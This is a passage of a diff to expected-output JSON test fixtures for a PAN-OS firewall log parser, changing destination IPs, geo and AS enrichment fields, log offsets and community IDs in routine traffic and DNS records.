-        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:49.000-02:00",
         "event.timezone": "-02:00",
@@ -8242,10 +7770,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 29789,
+        "log.offset": 29735,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:Vfi4CxQayypb3DoxclNfeNjXdjo=",
+        "network.community_id": "1:0Ma3cvskYuynmIkvb9KtKByU6JA=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -8277,14 +7805,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -8308,14 +7836,7 @@
         "client.port": 57846,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -8341,7 +7862,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 30153,
+        "log.offset": 30097,
         "network.application": "dns",
         "network.bytes": 71,
         "network.community_id": "1:cWkoifFGPLq+ZcxaNzzYym9H7jI=",
@@ -8407,14 +7928,7 @@
         "client.port": 51008,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -8440,7 +7954,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 30506,
+        "log.offset": 30450,
         "network.application": "dns",
         "network.bytes": 71,
         "network.community_id": "1:SicjKSp4oQCovx4rjFSg+IThGYA=",
@@ -8505,19 +8019,15 @@
         "client.packets": 1,
         "client.port": 59281,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -8530,7 +8040,7 @@
         "event.end": "2012-04-10T04:39:49.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:49.000-02:00",
         "event.timezone": "-02:00",
@@ -8542,10 +8052,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 30859,
+        "log.offset": 30803,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:/tG+YfZ8qFKrUDfQ7EThCBXci9Y=",
+        "network.community_id": "1:8GDPB5ZfeGIOX/3DLPuYG5D0Gko=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -8577,14 +8087,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -8608,14 +8118,7 @@
         "client.port": 55252,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -8641,7 +8144,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 31223,
+        "log.offset": 31165,
         "network.application": "dns",
         "network.bytes": 80,
         "network.community_id": "1:cp0HVI5MHMB+G4/hIuKGoX1WWac=",
@@ -8733,7 +8236,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 31576,
+        "log.offset": 31518,
         "network.application": "dns",
         "network.bytes": 176,
         "network.community_id": "1:X6pWtJqspZOnEXaF1nKblB/B3f4=",
@@ -8799,14 +8302,7 @@
         "client.port": 60989,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -8832,7 +8328,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 31942,
+        "log.offset": 31884,
         "network.application": "dns",
         "network.bytes": 80,
         "network.community_id": "1:bIf8k1Z5+8sNSsr63qo8XknzQDo=",
@@ -8897,19 +8393,15 @@
         "client.packets": 1,
         "client.port": 59280,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -8922,7 +8414,7 @@
         "event.end": "2012-04-10T04:39:48.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:48.000-02:00",
         "event.timezone": "-02:00",
@@ -8934,10 +8426,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 32295,
+        "log.offset": 32237,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:IRI0j5xLyLhwaONpy7gVZdl/Qow=",
+        "network.community_id": "1:Qa15R3rz4GWk8OTZoeYfdAqCt1M=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -8969,14 +8461,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -9000,14 +8492,7 @@
         "client.port": 53766,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -9033,7 +8518,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 32659,
+        "log.offset": 32599,
         "network.application": "dns",
         "network.bytes": 81,
         "network.community_id": "1:VJaNvIgkNIXRerGHtYQC0HUPZh8=",
@@ -9099,14 +8584,7 @@
         "client.port": 56032,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -9132,7 +8610,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 33012,
+        "log.offset": 32952,
         "network.application": "dns",
         "network.bytes": 81,
         "network.community_id": "1:fMeKYeqX7mnB812D1vOtHs7BRO4=",
@@ -9198,14 +8676,7 @@
         "client.port": 59193,
         "client.user.name": "crusher",
         "destination.address": "62.211.68.12",
-        "destination.as.number": 3269,
-        "destination.as.organization.name": "Telecom Italia",
         "destination.bytes": 906,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 43.1479,
-        "destination.geo.location.lon": 12.1097,
         "destination.ip": "62.211.68.12",
         "destination.packets": 7,
         "destination.port": 80,
@@ -9231,7 +8702,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 33365,
+        "log.offset": 33305,
         "network.application": "web-browsing",
         "network.bytes": 1487,
         "network.community_id": "1:2482BoM8NEujTrlI4lp2vfAxmus=",
@@ -9296,19 +8767,15 @@
         "client.packets": 1,
         "client.port": 59279,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -9321,7 +8788,7 @@
         "event.end": "2012-04-10T04:39:48.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:48.000-02:00",
         "event.timezone": "-02:00",
@@ -9333,10 +8800,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 33742,
+        "log.offset": 33682,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:FmIwID3HJ4Q0574SjlhMHApz/Hs=",
+        "network.community_id": "1:OUEPS1h8GK3pSmhORzo/qS63sDk=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -9368,14 +8835,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -9398,19 +8865,15 @@
         "client.packets": 1,
         "client.port": 59278,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -9423,7 +8886,7 @@
         "event.end": "2012-04-10T04:39:48.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:48.000-02:00",
         "event.timezone": "-02:00",
@@ -9435,10 +8898,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 34106,
+        "log.offset": 34044,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:WiUImNtgjkeNDi1Qigg7+Y6pDAg=",
+        "network.community_id": "1:vkRizl1InTFzh8mosWRsH13M1kE=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -9470,14 +8933,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -9500,19 +8963,15 @@
         "client.packets": 1,
         "client.port": 59277,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -9525,7 +8984,7 @@
         "event.end": "2012-04-10T04:39:47.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:47.000-02:00",
         "event.timezone": "-02:00",
@@ -9537,10 +8996,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 34470,
+        "log.offset": 34406,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:/+Opb16c1ye6uLeu1/TNC+SGnYs=",
+        "network.community_id": "1:fWPYdsanjAyyuvglU9X63EBU5rY=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -9572,14 +9031,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -9629,7 +9088,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 34834,
+        "log.offset": 34768,
         "network.application": "dns",
         "network.bytes": 166,
         "network.community_id": "1:h46cgrbWRw4seDnSlCbWxjLRmqs=",
@@ -9694,19 +9153,15 @@
         "client.packets": 3,
         "client.port": 59276,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 78,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 1,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -9719,7 +9174,7 @@
         "event.end": "2012-04-10T04:39:47.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:47.000-02:00",
         "event.timezone": "-02:00",
@@ -9731,10 +9186,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 35200,
+        "log.offset": 35134,
         "network.application": "web-browsing",
         "network.bytes": 429,
-        "network.community_id": "1:uslltTePy/m8Gxhk/MgPbZfk6Rg=",
+        "network.community_id": "1:0JDdHMQ/vA//AOa5kReESUaG4Zc=",
         "network.direction": "outbound",
         "network.packets": 4,
         "network.transport": "tcp",
@@ -9766,14 +9221,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 78,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 1,
         "server.port": 80,
         "service.type": "panw",
@@ -9796,19 +9251,15 @@
         "client.packets": 3,
         "client.port": 59275,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 78,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 1,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -9821,7 +9272,7 @@
         "event.end": "2012-04-10T04:39:47.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1",
+        "event.original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:47.000-02:00",
         "event.timezone": "-02:00",
@@ -9833,10 +9284,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 35567,
+        "log.offset": 35499,
         "network.application": "web-browsing",
         "network.bytes": 429,
-        "network.community_id": "1:AVMiOufq2owuhWpcu/TfRJ38tv4=",
+        "network.community_id": "1:3XOAuMIA4BGVLvrD2qCIXiQJjzI=",
         "network.direction": "outbound",
         "network.packets": 4,
         "network.transport": "tcp",
@@ -9868,14 +9319,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 78,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 1,
         "server.port": 80,
         "service.type": "panw",
@@ -9898,19 +9349,15 @@
         "client.packets": 1,
         "client.port": 59274,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
